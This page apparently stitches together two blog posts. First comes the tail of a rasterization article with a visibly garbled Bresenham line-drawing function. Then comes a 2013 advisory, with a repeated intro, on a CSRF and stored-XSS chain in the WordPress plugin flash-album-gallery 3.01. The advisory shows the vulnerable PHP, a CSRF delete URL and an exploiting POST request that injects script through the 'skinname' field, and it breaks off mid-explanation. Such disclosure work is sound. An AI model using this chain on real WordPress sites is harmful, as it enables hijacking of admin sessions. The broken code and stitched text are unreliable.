<p>[<img alt="Comparison of De Casteljau's algorithm and the
approximative
method," src="https://incolumitas.com/uploads/2013/10/approx_vs_casteljau2-1024x576.png"></p>
<p>Both splines are exactly the same. On the left is the curve
approximated by lines (fast) and on the right drawn with De
Casteljau's algorithm (slow).</p>
</li>
</ul>
<h3>Conclusion</h3>
<p>We saw some performance boosting techniques. From initial 7,3 seconds
with De Casteljaus algorithm (plotting 500 quadratic splines) , we made
it down to 0.252 seconds! That's around 40 times faster. Of course we
could be better, but let's stop here!</p>
<h3>Drawing Lines</h3>
<p>That's almost it! We also need a algorithm for plotting staright lines.
Maybe you think that's a trivial task, but not so fast my dear. There's
actually <a href="http://en.wikipedia.org/wiki/Bresenham's_line_algorithm">quite a bit of
math</a> behind
simple even lines! I adopted the algorithm from <a href="http://members.chello.at/easyfilter/bresenham.html">this
site</a>, which offers
also a 100 page strong essay about plotting geometrical primitives. The
text is quite hard to understand if you don't possess profound
mathematical knowledge, but it's still worth a glimpse!</p>
<p>However, this is the line plotting algorithm:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Yet another implementation taken from</span>
<span class="c1"># http://members.chello.at/easyfilter/bresenham.html</span>
<span class="c1"># This alogrithm is capable to plot all possible lines in a 2d plane.</span>
<span class="k">def</span> <span class="nf">line</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">points</span><span class="p">):</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">points</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">2</span> <span class="ow">or</span> <span class="ow">not</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nb">tuple</span><span class="p">):</span>
<span class="k">raise</span> <span class="n">InvalidInputError</span><span class="p">(</span><span class="s1">'To draw a line we need a list of two tuples containing two ints'</span><span class="p">)</span>
<span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">),</span> <span class="p">(</span><span class="n">x1</span><span class="p">,</span> <span class="n">y1</span><span class="p">)</span> <span class="o">=</span> <span class="n">points</span>
<span class="n">dx</span> <span class="o">=</span> <span class="nb">abs</span><span class="p">(</span><span class="n">x1</span><span class="o">-</span><span class="n">x0</span><span class="p">)</span>
<span class="n">dy</span> <span class="o">=</span> <span class="o">-</span><span class="nb">abs</span><span class="p">(</span><span class="n">y1</span><span class="o">-</span><span class="n">y0</span><span class="p">)</span>
<span class="n">sx</span> <span class="o">=</span> <span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">][</span><span class="n">x0</span><span class="o">=</span> <span class="n">dy</span><span class="p">):</span>
<span class="n">err</span> <span class="o">+=</span> <span class="n">dy</span>
<span class="n">x0</span> <span class="o">+=</span> <span class="n">sx</span>
<span class="k">if</span> <span class="p">(</span><span class="n">e2</span> <span class="o"><=</span> <span class="n">dx</span><span class="p">):</span>
<span class="n">err</span> <span class="o">+=</span> <span class="n">dx</span>
<span class="n">y0</span> <span class="o">+=</span> <span class="n">sy</span>
</code></pre></div>
<p>I have shown you some rasterization algorithms and now I am ready to use
them to draw my font. In the next article, I will use this code! So stay
tuned and send me a letter for Christmas!
s!</p>No 2. - flash-album-gallery: persistent XSS exploitet with help of XSRF leading to remote code execution.2013-07-27T15:44:00+02:002013-07-27T15:44:00+02:00Nikolai Tschachertag:incolumitas.com,2013-07-27:/2013/07/27/no-2-flash-album-gallery-persistent-xss-exploitet-with-help-of-xsrf-leading-to-remote-code-execution-k/<p><strong>PLUGIN:</strong> http://wordpress.org/plugins/flash-album-gallery/<br>
<strong>AFFECTED VERSION:</strong> 3.01<br>
<strong>DOWNLOADS:</strong> 840,714<br>
<strong>RISK:</strong> MEDIUM/HIGH</p>
<p>The following blog post addresses a critical (chain) of security issues
in the version 3.01 of flash-album-gallery<br>
which eventually leads to remote code execution. The exploit is not
completely automatically and needs a minimal amount<br>
of social engineering. Nevertheless I rate the danger at a medium/high
level {Probably even worse than a fully automatable SQL injection).</p>
<p>First of all, I need to say that the plugin code lacks a fair amount of
secure programming techniques and has inherent design flaws as far<br>
as I can say this [I am not a software engineer, I do security as a
hobby]. Assumingly, this is a direct result of heterogenous and<br>
evolutionary growth of the software.<br>
I researched flash-album-gallery mainly in June 2013 and after some
weeks I found a CSRF vulnerability in combination with<br>
a stored XSS. But on the same time I was preparing to contact the
author and reveal my findings, I noticed a new version and<br>
the bug seemed to be found by an independent researcher. See below the
lines <em>Fix: vulnerability with albums</em> and <em>Fix: XSS bugs reported by Ken …</em></p><p><strong>PLUGIN:</strong> http://wordpress.org/plugins/flash-album-gallery/<br>
<strong>AFFECTED VERSION:</strong> 3.01<br>
<strong>DOWNLOADS:</strong> 840,714<br>
<strong>RISK:</strong> MEDIUM/HIGH</p>
<p>The following blog post addresses a critical (chain) of security issues
in the version 3.01 of flash-album-gallery<br>
which eventually leads to remote code execution. The exploit is not
completely automatically and needs a minimal amount<br>
of social engineering. Nevertheless I rate the danger at a medium/high
level {Probably even worse than a fully automatable SQL injection).</p>
<p>First of all, I need to say that the plugin code lacks a fair amount of
secure programming techniques and has inherent design flaws as far<br>
as I can say this [I am not a software engineer, I do security as a
hobby]. Assumingly, this is a direct result of heterogenous and<br>
evolutionary growth of the software.<br>
I researched flash-album-gallery mainly in June 2013 and after some
weeks I found a CSRF vulnerability in combination with<br>
a stored XSS. But on the same time I was preparing to contact the
author and reveal my findings, I noticed a new version and<br>
the bug seemed to be found by an independent researcher. See below the
lines <em>Fix: vulnerability with albums</em> and <em>Fix: XSS bugs reported by Ken S for the White Fir Design Bug
Bounty</em>.</p>
<div class="highlight"><pre><span></span><code><span class="o">=</span><span class="w"> </span><span class="n">v3</span><span class="o">.</span><span class="mi">00</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mf">26.06</span><span class="o">.</span><span class="mi">2013</span><span class="w"> </span><span class="o">=</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">Free</span><span class="w"> </span><span class="n">skins</span><span class="w"> </span><span class="n">settings</span><span class="w"> </span><span class="n">reset</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">default</span><span class="w"> </span><span class="n">after</span><span class="w"> </span><span class="n">plugin</span><span class="w"> </span><span class="n">update</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">XSS</span><span class="w"> </span><span class="n">bugs</span><span class="w"> </span><span class="n">reported</span><span class="w"> </span><span class="n">by</span><span class="w"> </span><span class="n">Ken</span><span class="w"> </span><span class="n">S</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">White</span><span class="w"> </span><span class="n">Fir</span><span class="w"> </span><span class="n">Design</span><span class="w"> </span><span class="n">Bug</span><span class="w"> </span><span class="n">Bounty</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">small</span><span class="w"> </span><span class="n">bugfixes</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">New</span><span class="p">:</span><span class="w"> </span><span class="n">iOS</span><span class="w"> </span><span class="n">application</span><span class="w"> </span><span class="s1">'MyPGC'</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">Flagallery</span><span class="w"> </span><span class="n">plugin</span><span class="w"> </span><span class="n">now</span><span class="w"> </span><span class="n">available</span><span class="w"> </span><span class="n">on</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">App</span><span class="w"> </span><span class="n">Store</span><span class="w"></span>
<span class="o">=</span><span class="w"> </span><span class="n">v2</span><span class="o">.</span><span class="mi">78</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mf">26.06</span><span class="o">.</span><span class="mi">2013</span><span class="w"> </span><span class="o">=</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">bundled</span><span class="w"> </span><span class="n">free</span><span class="w"> </span><span class="n">skins</span><span class="w"> </span><span class="ow">not</span><span class="w"> </span><span class="n">copied</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">flagallery</span><span class="o">-</span><span class="n">skins</span><span class="w"> </span><span class="n">directory</span><span class="w"></span>
<span class="o">=</span><span class="w"> </span><span class="n">v2</span><span class="o">.</span><span class="mi">77</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mf">25.06</span><span class="o">.</span><span class="mi">2013</span><span class="w"> </span><span class="o">=</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">vulnerability</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">albums</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">PHP</span><span class="w"> </span><span class="n">Notices</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">Compatibility</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">some</span><span class="w"> </span><span class="n">modern</span><span class="w"> </span><span class="n">themes</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Update</span><span class="p">:</span><span class="w"> </span><span class="n">New</span><span class="w"> </span><span class="n">version</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">swfupload</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Update</span><span class="p">:</span><span class="w"> </span><span class="n">Compatibility</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">Wordpress</span><span class="w"> </span><span class="n">SEO</span><span class="w"> </span><span class="n">plugin</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Update</span><span class="p">:</span><span class="w"> </span><span class="n">Update</span><span class="w"> </span><span class="n">code</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">default</span><span class="w"> </span><span class="n">skins</span><span class="w"></span>
</code></pre></div>
<p>I considered the issue as solved [To my shame] and called the
researching an end and forgot about flash-album-gallery.<br>
But currently, I was revisiting the code and saw that there is still
exactly the same issue with another variable and file.</p>
<p>The concerned file is music-box.php situated at
/wp-content/plugins/flash-album-gallery/admin/music-box.php at LINE
17. This is the vulnerable function:</p>
<div class="highlight"><pre><span></span><code><span class="x">function flag_music_controler() {</span>
<span class="x"> if (isset($_POST['importfolder']) && $_POST['importfolder']){</span>
<span class="x"> check_admin_referer('flag_addmp3');</span>
<span class="x"> $mp3folder = $_POST['mp3folder'];</span>
<span class="x"> if ( !empty($mp3folder) )</span>
<span class="x"> flagAdmin::import_mp3($mp3folder);</span>
<span class="x"> }</span>
<span class="x"> $mode = isset($_REQUEST['mode'])? $_REQUEST['mode'] : 'main';</span>
<span class="x"> $action = isset($_REQUEST['bulkaction'])? $_REQUEST['bulkaction'] : false;</span>
<span class="x"> if($action == 'no_action') {</span>
<span class="x"> $action = false;</span>
<span class="x"> }</span>
<span class="x"> switch($mode) {</span>
<span class="x"> case 'sort':</span>
<span class="x"> include_once (dirname (__FILE__) . '/playlist-sort.php');</span>
<span class="x"> flag_playlist_order();</span>
<span class="x"> break;</span>
<span class="x"> case 'edit':</span>
<span class="x"> $file = urlencode($_GET['playlist']);</span>
<span class="x"> if(isset($_POST['updatePlaylist'])) {</span>
<span class="x"> $title = esc_html($_POST['playlist_title']);</span>
<span class="x"> $descr = esc_html($_POST['playlist_descr']);</span>
<span class="x"> $data = array();</span>
<span class="x"> foreach($_POST['item_a'] as $item_id => $item) {</span>
<span class="x"> if($action=='delete_items' && in_array($item_id, $_POST['doaction']))</span>
<span class="x"> continue;</span>
<span class="x"> $data[] = $item_id;</span>
<span class="x"> }</span>
<span class="x"> flagGallery::flagSaveWpMedia();</span>
<span class="x"> flagSavePlaylist($title,$descr,$data,$file);</span>
<span class="x"> }</span>
<span class="x"> if(isset($_POST['updatePlaylistSkin'])) {</span>
<span class="x"> flagSavePlaylistSkin($file);</span>
<span class="x"> }</span>
<span class="x"> include_once (dirname (__FILE__) . '/manage-playlist.php');</span>
<span class="x"> flag_playlist_edit();</span>
<span class="x"> break;</span>
<span class="x"> case 'save':</span>
<span class="x"> if(isset($_POST['items_array'])){</span>
<span class="x"> $title = esc_html($_POST['playlist_title']);</span>
<span class="x"> $descr = esc_html($_POST['playlist_descr']);</span>
<span class="x"> $data = $_POST['items_array'];</span>
<span class="x"> $file = isset($_REQUEST['playlist'])? urlencode($_REQUEST['playlist']) : false;</span>
<span class="x"> flagGallery::flagSaveWpMedia();</span>
<span class="x"> flagSavePlaylist($title,$descr,$data, $file);</span>
<span class="x"> }</span>
<span class="x"> if(isset($_GET['playlist'])) {</span>
<span class="x"> include_once (dirname (__FILE__) . '/manage-playlist.php');</span>
<span class="x"> flag_playlist_edit();</span>
<span class="x"> } else {</span>
<span class="x"> flag_created_playlists();</span>
<span class="x"> flag_music_wp_media_lib();</span>
<span class="x"> }</span>
<span class="x"> break;</span>
<span class="x"> case 'add':</span>
<span class="x"> if(isset($_POST['items']) && isset($_GET['playlist'])){</span>
<span class="x"> $added = $_POST['items'];</span>
<span class="x"> } elseif(isset($_GET['playlist'])) {</span>
<span class="x"> $added = $_COOKIE['musicboxplaylist_'.urlencode($_GET['playlist'])];</span>
<span class="x"> } else {</span>
<span class="x"> $added = false;</span>
<span class="x"> }</span>
<span class="x"> flag_music_wp_media_lib($added);</span>
<span class="x"> break;</span>
<span class="x"> case 'delete':</span>
<span class="x"> flag_playlist_delete(urlencode($_GET['playlist']));</span>
<span class="x"> case 'main':</span>
<span class="x"> if(isset($_POST['updateMedia'])) {</span>
<span class="x"> flagGallery::flagSaveWpMedia();</span>
<span class="x"> flagGallery::show_message( __('Media updated','flag') );</span>
<span class="x"> }</span>
<span class="x"> default:</span>
<span class="x"> flag_created_playlists();</span>
<span class="x"> flag_music_wp_media_lib();</span>
<span class="x"> break;</span>
<span class="x"> }</span>
<span class="x"> }</span>
</code></pre></div>
<p>Well, alone in this function and its subsequent calls, there are more
security bugs than I can descibe here.<br>
But to just name the one critical I mentioned before, this POST request
inserts tainted data into a file, which<br>
is lateron echoed back to the admin menu which triggers an XSS.</p>
<div class="highlight"><pre><span></span><code>============================================ EXPLOITING POST REQUEST ========================
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: {The wordpress cookie of the admin}
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
items_array[0]=notimportant<span class="err">&</span>playlist_title=some_title<span class="err">&</span>playlist_descr=some_description<span class="err">&</span>mode=save<span class="err">&</span>skinname="<span class="nt"><script></span>alert(/Script Code/)<span class="nt"></script></span>
=============================================================================================
</code></pre></div>
<p>Explanation:</p>
<p>Due to inpropper coding style, this request is not protected by a nonce,
which would prevent a CSRF attack. For explanation of nonces and why<br>
they are impportant, look here:
http://www.prelovac.com/vladimir/improving-security-in-wordpress-plugins-using-nonces.<br>
However, the author<br>
probably intended to protect it with a nonce, because he actually
inserted one in the form field here:</p>
<div class="highlight"><pre><span></span><code><span class="c"><!--</span> <span class="err">#</span><span class="nx">new_playlist</span> <span class="o">--></span>
<span class="o"><</span><span class="nx">div</span> <span class="nx">id</span><span class="o">=</span><span class="s2">"new_playlist"</span> <span class="nx">style</span><span class="o">=</span><span class="s2">"display: none;"</span> <span class="o">></span>
<span class="o"><</span><span class="nx">form</span> <span class="nx">id</span><span class="o">=</span><span class="s2">"form_new_playlist"</span> <span class="nx">method</span><span class="o">=</span><span class="s2">"POST"</span> <span class="nx">action</span><span class="o">=</span><span class="s2">"</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nv">$filepath</span><span class="p">;</span> <span class="cp">?></span><span class="s2">"</span> <span class="nx">accept</span><span class="o">-</span><span class="nx">charset</span><span class="o">=</span><span class="s2">"utf-8"</span><span class="o">></span>
<span class="o">===></span> <span class="cp"><?php</span> <span class="nx">wp_nonce_field</span><span class="p">(</span><span class="s1">'flag_thickbox_form'</span><span class="p">);</span> <span class="cp">?></span>
<span class="o"><</span><span class="nx">input</span> <span class="nx">type</span><span class="o">=</span><span class="s2">"hidden"</span> <span class="nx">id</span><span class="o">=</span><span class="s2">"new_playlist_mp3id"</span> <span class="nx">name</span><span class="o">=</span><span class="s2">"items_array"</span> <span class="nx">value</span><span class="o">=</span><span class="s2">""</span> <span class="o">/></span>
<span class="o"><</span><span class="nx">input</span> <span class="nx">type</span><span class="o">=</span><span class="s2">"hidden"</span> <span class="nx">id</span><span class="o">=</span><span class="s2">"new_playlist_bulkaction"</span> <span class="nx">name</span><span class="o">=</span><span class="s2">"TB_bulkaction"</span> <span class="nx">value</span><span class="o">=</span><span class="s2">""</span> <span class="o">/></span>
<span class="o"><</span><span class="nx">input</span> <span class="nx">type</span><span class="o">=</span><span class="s2">"hidden"</span> <span class="nx">name</span><span class="o">=</span><span class="s2">"mode"</span> <span class="nx">value</span><span class="o">=</span><span class="s2">"save"</span> <span class="o">/></span>
<span class="o"><</span><span class="nx">input</span> <span class="nx">type</span><span class="o">=</span><span class="s2">"hidden"</span> <span class="nx">name</span><span class="o">=</span><span class="s2">"page"</span> <span class="nx">value</span><span class="o">=</span><span class="s2">"music-box"</span> <span class="o">/></span>
<span class="o"><</span><span class="nx">table</span> <span class="nx">width</span><span class="o">=</span><span class="s2">"100%"</span> <span class="nx">border</span><span class="o">=</span><span class="s2">"0"</span> <span class="nx">cellspacing</span><span class="o">=</span><span class="s2">"3"</span> <span class="nx">cellpadding</span><span class="o">=</span><span class="s2">"3"</span> <span class="o">></span>
</code></pre></div>
<p>Unfortunately, this nonce is actually never checked with a appropriate
function like<br>
- <code>wp_verify_nonce($nonce, $action = -1)</code><br>
- <code>check_ajax_referer( $action = -1, $query_arg = false, $die = true )</code>
- <code>check_admin_referer($action = -1, $query_arg = '_wpnonce')</code></p>
<p>Henceforth, alone this constitutes a XSRF, which for itself is a
security threat. Because of the missing nonce check in all cases of the
switch statement<br>
in the above code excerpt, this requests for example deletes any album
specified by the GET parameter playlist <code>http://localhost/wordpress/wp-admin/admin.php?page=flag-music-box&mode=delete&playlist={Which?}</code></p>
<p>But back to main issue. Remember that we can trick any wordpress admin
with a poisoned page and a installation with this plugin to execute<br>
the above cases in the switch statement. Now consider the case save.
There is a call to a function named flagSavePlaylist().<br>
This function saves a music playlist to a xml file. Every parameter
that is written to the xml file is propperly escaped with<br>
functions like htmlspechialchars(). But one parameter is (strangely)
ignored. The variable $skin is populated with user<br>
submitable input and later written to the xml file. (See below the two
arrows). Please note, that an exploitation attempt will lead to an error
message printed (See "!Error! ===>" below) because <code>file_get_contents()</code> is
called with a string constructed with the tainted $skin variable.
Script code<br>
rarily looks like valid paths. But this doesn't hinder the working of
the flow of the exploitation process.</p>
<p>file /wp-content/plugins/flash-album-gallery/admin/music-box.php at
LINE 17:</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="k">function</span><span class="w"> </span><span class="nf">flagSavePlaylist</span><span class="p">(</span>$title,$descr,$data,$file='',$skinaction=''<span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">global</span><span class="w"> </span>$<span class="n">wpdb</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span>!<span class="n">trim</span><span class="p">(</span>$<span class="nb">title</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span>$<span class="nb">title</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="s">'default'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span>$<span class="nb">title</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">htmlspecialchars_decode</span><span class="p">(</span><span class="n">stripslashes</span><span class="p">(</span>$<span class="nb">title</span><span class="p">),</span><span class="w"> </span><span class="n">ENT_QUOTES</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span>$<span class="n">descr</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">htmlspecialchars_decode</span><span class="p">(</span><span class="n">stripslashes</span><span class="p">(</span>$<span class="n">descr</span><span class="p">),</span><span class="w"> </span><span class="n">ENT_QUOTES</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span>!$<span class="n">file</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span>$<span class="n">file</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">sanitize_title</span><span class="p">(</span>$<span class="nb">title</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span>!<span class="n">is_array</span><span class="p">(</span>$<span class="n">data</span><span class="p">))</span><span class="w"></span>
<span class="w"> </span>$<span class="n">data</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">explode</span><span class="p">(</span><span class="s">','</span><span class="p">,</span><span class="w"> </span>$<span class="n">data</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span>$<span class="n">flag_options</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">get_option</span><span class="p">(</span><span class="s">'flag_options'</span><span class="p">);</span><span class="w"></span>
<span class="o">==</span><span class="p">=</span><span class="o">></span><span class="w"> </span>$<span class="n">skin</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">isset</span><span class="p">(</span>$<span class="n">_POST</span><span class="p">[</span><span class="s">'skinname'</span><span class="p">])</span>?<span class="w"> </span>$<span class="n">_POST</span><span class="p">[</span><span class="s">'skinname'</span><span class="p">]</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="s">'music_default'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span>!$<span class="n">skinaction</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span>$<span class="n">skinaction</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">isset</span><span class="p">(</span>$<span class="n">_POST</span><span class="p">[</span><span class="s">'skinaction'</span><span class="p">])</span>?<span class="w"> </span>$<span class="n">_POST</span><span class="p">[</span><span class="s">'skinaction'</span><span class="p">]</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="s">'update'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span>$<span class="n">skinpath</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">trailingslashit</span><span class="p">(</span><span class="w"> </span>$<span class="n">flag_options</span><span class="p">[</span><span class="s">'skinsDirABS'</span><span class="p">]</span><span class="w"> </span><span class="p">).</span>$<span class="n">skin</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span>$<span class="n">playlistPath</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">ABSPATH</span><span class="p">.</span>$<span class="n">flag_options</span><span class="p">[</span><span class="s">'galleryPath'</span><span class="p">].</span><span class="o">'</span><span class="n">playlists</span><span class="o">/</span><span class="s">'.$file.'</span><span class="p">.</span><span class="n">xml</span><span class="o">'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="w"> </span><span class="n">file_exists</span><span class="p">(</span>$<span class="n">playlistPath</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="p">(</span>$<span class="n">skin</span><span class="w"> </span><span class="o">==</span><span class="w"> </span>$<span class="n">skinaction</span><span class="p">)</span><span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span>$<span class="nb">settings</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">file_get_contents</span><span class="p">(</span>$<span class="n">playlistPath</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="sx">!Error! ===> $settings = file_get_contents($skinpath . "/settings/settings.xml");</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span>$<span class="nb">properties</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">flagGallery</span><span class="p">::</span><span class="n">flagGetBetween</span><span class="p">(</span>$<span class="nb">settings</span><span class="p">,</span><span class="s">'<properties>'</span><span class="p">,</span><span class="s">'</properties>'</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="nb">count</span><span class="p">(</span>$<span class="n">data</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span>$<span class="n">content</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="s">'<gallery></span>
<span class="s"> <properties>'</span><span class="p">.</span>$<span class="nb">properties</span><span class="p">.</span><span class="o">'</</span><span class="nb">properties</span><span class="o">></span><span class="w"></span>
<span class="w"> </span><span class="o"><</span><span class="n">category</span><span class="w"> </span><span class="n">id</span><span class="p">=</span><span class="s">"'.$file.'"</span><span class="o">></span><span class="w"></span>
<span class="w"> </span><span class="o"><</span><span class="nb">properties</span><span class="o">></span><span class="w"></span>
<span class="w"> </span><span class="o"><</span><span class="nb">title</span><span class="o">><</span>!<span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="s">'.$title.'</span><span class="p">]]]]</span><span class="o">><</span>!<span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="o">></</span><span class="nb">title</span><span class="o">></span><span class="w"></span>
<span class="w"> </span><span class="o"><</span><span class="n">description</span><span class="o">><</span>!<span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="s">'.$descr.'</span><span class="p">]]]]</span><span class="o">><</span>!<span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="o">></</span><span class="n">description</span><span class="o">></span><span class="w"></span>
<span class="o">==</span><span class="p">=</span><span class="o">></span><span class="w"> </span><span class="o"><</span><span class="n">skin</span><span class="o">><</span>!<span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="s">'.$skin.'</span><span class="p">]]]]</span><span class="o">><</span>!<span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="o">></</span><span class="n">skin</span><span class="o">></span><span class="w"></span>
<span class="w"> </span><span class="o"></</span><span class="nb">properties</span><span class="o">></span><span class="w"></span>
<span class="w"> </span><span class="o"><</span><span class="n">items</span><span class="o">></span><span class="s">';</span>
<span class="s"> foreach( (array) $data as $id) {</span>
<span class="s"> $mp3 = get_post($id);</span>
<span class="s"> if($mp3->post_mime_type == '</span><span class="n">audio</span><span class="o">/</span><span class="n">mpeg</span><span class="o">'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span>$<span class="n">thumb</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">get_post_meta</span><span class="p">(</span>$<span class="n">id</span><span class="p">,</span><span class="w"> </span><span class="s">'thumbnail'</span><span class="p">,</span><span class="w"> </span><span class="nb">true</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span>$<span class="n">content</span><span class="w"> </span><span class="p">.=</span><span class="w"> </span><span class="s">'</span>
<span class="s"> <item id="'</span><span class="p">.</span>$<span class="n">mp3</span><span class="o">-></span><span class="n">ID</span><span class="p">.</span><span class="o">'</span><span class="s">"></span>
<span class="s"> <track>'.wp_get_attachment_url($mp3->ID).'</track></span>
<span class="s"> <title><![CDATA['.$mp3->post_title.']]]]><![CDATA[></title></span>
<span class="s"> <description><![CDATA['.$mp3->post_content.']]]]><![CDATA[></description></span>
<span class="s"> <thumbnail>'.$thumb.'</thumbnail></span>
<span class="s"> </item>';</span>
<span class="s"> }</span>
<span class="s"> }</span>
<span class="s"> $content .= '</span>
<span class="s"> </items></span>
<span class="s"> </category></span>
<span class="s"> </gallery>';</span>
<span class="s"> // Save options</span>
<span class="s"> $flag_options = get_option('flag_options');</span>
<span class="s"> if(wp_mkdir_p(ABSPATH.$flag_options['galleryPath'].'playlists/')) {</span>
<span class="s"> if( flagGallery::saveFile($playlistPath,$content,'w') ){</span>
<span class="s"> flagGallery::show_message(__('Playlist Saved Successfully','flag'));</span>
<span class="s"> }</span>
<span class="s"> } else {</span>
<span class="s"> flagGallery::show_message(__('Create directory please:','flag').'"</span><span class="o">/</span><span class="s">'.$flag_options['</span><span class="n">galleryPath</span><span class="o">'</span><span class="p">].</span><span class="o">'</span><span class="n">playlists</span><span class="o">/</span>"<span class="s">'</span><span class="err">);</span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Now we know that tainted [html/javascript] data is in a xml file. This
is not dangerous by itself [But really bad at least].<br>
But what if this data is written back to the browser without
sanitation? Then we could write any script code within a admin<br>
session.</p>
<p>But this is exactly what happens here in the file /wp-content/plugins/flash-album-gallery/admin/music-box.php at LINE 386:</p>
